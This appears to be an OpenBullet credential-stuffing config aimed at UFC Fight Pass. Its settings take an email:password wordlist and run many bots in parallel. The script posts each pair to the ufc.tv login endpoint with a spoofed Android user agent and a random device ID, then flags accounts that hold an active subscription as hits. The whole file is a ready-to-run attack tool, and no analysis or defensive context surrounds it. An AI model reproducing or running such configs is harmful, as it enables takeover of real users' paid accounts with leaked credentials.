[SETTINGS]
{
  "Name": "UFC FIGHTPASS",
  "SuggestedBots": 50,
  "LastModified": "2018-08-15T19:22:11.4084962+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
FUNCTION RandomNum 100000 999999 "" -> VAR "RAND" 
#POST_LOGIN REQUEST POST "https://www.ufc.tv/secure/authenticate" AutoRedirect=TRUE 
  CONTENT "username=<USER>&devicetype=8&format=json&password=<PASS>&deviceid=354730020<RAND>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-G955N Build/NRD90M) android mobile ufc 8.0517" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "data\":{}}" 
  KEYCHAIN Success OR 
    KEY "hasSubscription\":\"true" 
